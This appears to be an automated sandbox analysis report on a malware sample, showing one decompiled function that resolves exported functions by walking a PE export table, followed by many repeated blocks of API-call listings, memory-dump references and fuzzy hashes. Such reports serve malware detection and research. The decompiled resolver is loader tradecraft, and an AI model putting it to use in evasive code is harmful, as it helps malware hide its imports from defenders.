      • Instruction ID: 81a772609b1be3753ee91d77cf381401c8db6a6cdce0ee8bcfb7c7911c54f1bb
      • Opcode Fuzzy Hash: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
      • Instruction Fuzzy Hash: 8AC012307CC302AADA102BB20C09B9BB9782F09B82F208C726909E91C1CA7CC120816D
      C-Code - Quality: 86%
      			E004029CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
      				void* _t56;
      				intOrPtr* _t57;
      				intOrPtr _t60;
      				signed int _t61;
      				CHAR* _t65;
      				intOrPtr* _t77;
      				intOrPtr _t79;
      				CHAR* _t80;
      				intOrPtr _t85;
      				signed int _t88;
      				signed short* _t90;
      				void* _t94;
      				void* _t95;
      				void* _t108;
      
      				_push(0x2c);
      				_push(0x404140);
      				E00402F20(__ebx, __edi, __esi);
      				 *((intOrPtr*)(_t95 - 0x24)) = 0;
      				 *(_t95 - 4) = 0;
      				_t85 =  *((intOrPtr*)(_t95 + 8));
      				_t56 =  *((intOrPtr*)(_t85 + 0x3c)) + _t85;
      				if( *((short*)(_t56 + 4)) != 0x14c) {
      					_t57 = _t56 + 0x88;
      				} else {
      					_t57 = _t56 + 0x78;
      				}
      				_t94 =  *_t57 + _t85;
      				if( *_t57 == 0 ||  *((intOrPtr*)(_t57 + 4)) == 0 ||  *((intOrPtr*)(_t94 + 0x1c)) == 0) {
      					L27:
      					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
      					return E00402F5B( *((intOrPtr*)(_t95 - 0x24)));
      				} else {
      					_t60 =  *((intOrPtr*)(_t94 + 0x14));
      					if(_t60 != 0) {
      						_t79 =  *((intOrPtr*)(_t94 + 0x1c)) + _t85;
      						 *((intOrPtr*)(_t95 - 0x34)) = _t79;
      						_t88 =  *(_t95 + 0xc);
      						 *(_t95 - 0x20) = _t88;
      						if(_t88 == 0 || _t88 > 0xffff) {
      							 *(_t95 - 0x20) = 0;
      							_t60 =  *((intOrPtr*)(_t94 + 0x18));
      						}
      						 *((intOrPtr*)(_t95 - 0x2c)) = _t60;
      						if( *((intOrPtr*)(_t94 + 0x24)) == 0) {
      							_t61 =  *(_t95 - 0x20);
      							if(_t61 != 0) {
      								 *((intOrPtr*)(_t95 - 0x24)) = _t79 + _t61 * 4 - 4;
      							}
      							goto L27;
      						}
      						_t90 =  *((intOrPtr*)(_t94 + 0x24)) + _t85;
      						 *(_t95 - 0x3c) = _t90;
      						_t77 =  *((intOrPtr*)(_t94 + 0x20)) + _t85;
      						 *((intOrPtr*)(_t95 - 0x38)) = _t77;
      						 *(_t95 - 0x28) =  *(_t95 - 0x28) & 0x00000000;
      						while( *(_t95 - 0x28) <  *((intOrPtr*)(_t95 - 0x2c))) {
      							 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
      							if( *(_t95 - 0x20) == 0) {
      								_t65 =  *_t77 + _t85;
      								 *(_t95 - 0x30) = _t65;
      								_t80 =  *(_t95 + 0xc);
      								if(_t80 == 0) {
      									E00402BEA(lstrlenA(_t65),  *(_t95 - 0x30));
      									L19:
      									if(_t108 == 0) {
      										 *(_t95 - 0x1c) = 1;
      									}
      									L21:
      									if( *(_t95 - 0x1c) == 0) {
      										_t77 = _t77 + 4;
      										 *((intOrPtr*)(_t95 - 0x38)) = _t77;
      										_t90 =  &(_t90[1]);
      										 *(_t95 - 0x3c) = _t90;
      										 *(_t95 - 0x28) =  *(_t95 - 0x28) + 1;
      										_t85 =  *((intOrPtr*)(_t95 + 8));
      										continue;
      									}
      									 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x34)) + ( *_t90 & 0x0000ffff) * 4;
      									if(0 != 0) {
      										 *((intOrPtr*)(0)) =  *_t77 +  *((intOrPtr*)(_t95 + 8));
      									}
      									goto L27;
      								}
      								if( *_t65 !=  *_t80) {
      									goto L21;
      								}
      								lstrcmpA(_t65, _t80); // executed
      								goto L19;
      							}
      							_t108 =  *(_t95 - 0x20) - ( *_t90 & 0x0000ffff) +  *((intOrPtr*)(_t94 + 0x10));
      							goto L19;
      						}
      					}
      					goto L27;
      				}
      			}


















      APIs
      • lstrcmpA.KERNEL32(?,?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402A9A
      • lstrlenA.KERNEL32(?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402AA5
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: lstrcmplstrlen
      • String ID:
      • API String ID: 898299967-0
      • Opcode ID: 359c905574d0e12692396af4256237419557066a94b145a0bfe448bece07f85a
      • Instruction ID: 40c428d3c91ca5d49947b9e85c7df197b014cf7646aa79326ee3b1aaee03fb73
      • Opcode Fuzzy Hash: 359c905574d0e12692396af4256237419557066a94b145a0bfe448bece07f85a
      • Instruction Fuzzy Hash: 51410671A00205CFCB24CF95CA886AEB7B1BF48314F18857AE406B77D1DBB8A945DF58
      APIs
      • GetProcAddress.KERNELBASE(?,?,?,00290327,2B14D0EE,?), ref: 00290639
      Memory Dump Source
      • Source File: 00000001.00000002.3011296226.0000000000290000.00000040.sdmp, Offset: 00290000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_290000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressProc
      • String ID:
      • API String ID: 190572456-0
      • Opcode ID: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
      • Instruction ID: 66bb89836946217719fa1830f2b9e7a8747c0fc1b59c0e83c515c5d7d9fa2e60
      • Opcode Fuzzy Hash: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
      • Instruction Fuzzy Hash: 5A11187661021AAFDF10CF19C8C0A6A77A8FF9476871A8065ED59DB302D770FD21CB90
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: d887a1b9b9a293fb6643796ec88173bc19549d331bda4141dc30bae08f8dfd00
      • Instruction ID: d81a97c829a48bbb7a31155ba5374c7c5e92687da60c171e40c76ce8b8895330
      • Opcode Fuzzy Hash: d887a1b9b9a293fb6643796ec88173bc19549d331bda4141dc30bae08f8dfd00
      • Instruction Fuzzy Hash: 68B09281279001EC214852191A06C3B011CC180B51360801BB404C0340E8805D624132
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8B57
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 08633c5ff66e38542d1e9167bdb95828e41a1c9f5572b34cd27729c5f1ffe65b
      • Instruction ID: 37d8ee192c77179e7ddd16b87eaa73e4ba693ce94fbcab49fe494029176d988a
      • Opcode Fuzzy Hash: 08633c5ff66e38542d1e9167bdb95828e41a1c9f5572b34cd27729c5f1ffe65b
      • Instruction Fuzzy Hash: 1BB011C22BA000FC3288A20C2E23C3B020CC0C2F28330802FF808CA380EE80AC328032
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8B57
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: f2145e0eff17c266d6205fdb0be8f45e93ddb4912b7fc7b46ac561554ab2a9ef
      • Instruction ID: a749a5767d2f7bed7b6f7b7c8a4bf29287038ee66957973964a8bff4ddc42456
      • Opcode Fuzzy Hash: f2145e0eff17c266d6205fdb0be8f45e93ddb4912b7fc7b46ac561554ab2a9ef
      • Instruction Fuzzy Hash: E5B011C2ABA002FC3208220C2E2BC3B020CC0C0F28330882FF800C03C0EE80AC328032
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: a6f4919016f9d4e1ed599234c65eefd1822f222d5b524256dadd4dfcb20af29c
      • Instruction ID: 1e842914e79a10eb9fc40c6bc6dac86f227d2bbefd0535c0e2f203a5ff104357
      • Opcode Fuzzy Hash: a6f4919016f9d4e1ed599234c65eefd1822f222d5b524256dadd4dfcb20af29c
      • Instruction Fuzzy Hash: A6B0128127D001FC3148521D1E06D37011CC1C0B51370C01FF404C0340F8C05C714133
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: b46da73b24451c06b1d41b79e63a69688d0c7256f8c829bcdbf4679539e3ce99
      • Instruction ID: b5818cf1dbbd8b681e4abb75581fb8e6a31de7a2c8500f11b92cd033259366e4
      • Opcode Fuzzy Hash: b46da73b24451c06b1d41b79e63a69688d0c7256f8c829bcdbf4679539e3ce99
      • Instruction Fuzzy Hash: 91B0128137D004FC3108524B1D1AD37010CD1C5B11330801FF801C5380FC802C314132
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 80056d24e124bcde898aeb04738165ee032a464c830b16543d38caa8aade2a2f
      • Instruction ID: 4b0e871a9492406ebb0dcff34c5e352ac9d014de3ca0447890464f8e4903671c
      • Opcode Fuzzy Hash: 80056d24e124bcde898aeb04738165ee032a464c830b16543d38caa8aade2a2f
      • Instruction Fuzzy Hash: FDB0128527D000FC3208524A1D06C37010CC1C2B11330C01FFC01C5340EC812C314132
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 15e1797f4050d2f757d0ad6f836f2fbe290bd14c74dcc157cf584a7b2143a2d3
      • Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
      • Opcode Fuzzy Hash: 15e1797f4050d2f757d0ad6f836f2fbe290bd14c74dcc157cf584a7b2143a2d3
      • Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8B03
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: a32cbe9725e0bd26275476f0a529cbef2e688beef3ebce537fbb3e407a4807b7
      • Instruction ID: e451197de2f7dda933ed13ce4341d696ea0a56eec5846a4d52a46feb8683a5fd
      • Opcode Fuzzy Hash: a32cbe9725e0bd26275476f0a529cbef2e688beef3ebce537fbb3e407a4807b7
      • Instruction Fuzzy Hash: 81A001962BA902BC710862526E0AC3B022CC5C6B61331891FF942C4391ACC12C6A9436
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: a4456afe367ea0059b8248b7b371106758c33009ab3367d327d5bcebe8f109b9
      • Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
      • Opcode Fuzzy Hash: a4456afe367ea0059b8248b7b371106758c33009ab3367d327d5bcebe8f109b9
      • Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: 029d4b1a356b2d96f3e42eec435ee491234ace2f67ff70faee3ad19f72fb2b30
      • Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
      • Opcode Fuzzy Hash: 029d4b1a356b2d96f3e42eec435ee491234ace2f67ff70faee3ad19f72fb2b30
      • Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8B03
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: d7d00b1626190d8c1e9e2cbaa98bcd63b32229933cfc42eda6cb7f2653eb2557
      • Instruction ID: e451197de2f7dda933ed13ce4341d696ea0a56eec5846a4d52a46feb8683a5fd
      • Opcode Fuzzy Hash: d7d00b1626190d8c1e9e2cbaa98bcd63b32229933cfc42eda6cb7f2653eb2557
      • Instruction Fuzzy Hash: 81A001962BA902BC710862526E0AC3B022CC5C6B61331891FF942C4391ACC12C6A9436
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D91EE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
        • Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
        • Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
        • Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
      • String ID:
      • API String ID: 1405810187-0
      • Opcode ID: c09971676b397e555c6cfb2639ebf0795ab8f94d57ad3b535ee41ca40eae691c
      • Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
      • Opcode Fuzzy Hash: c09971676b397e555c6cfb2639ebf0795ab8f94d57ad3b535ee41ca40eae691c
      • Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432
      APIs
      • ___delayLoadHelper2@8.DELAYIMP ref: 002D8B03
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
        • Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
        • Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
        • Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
        • Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
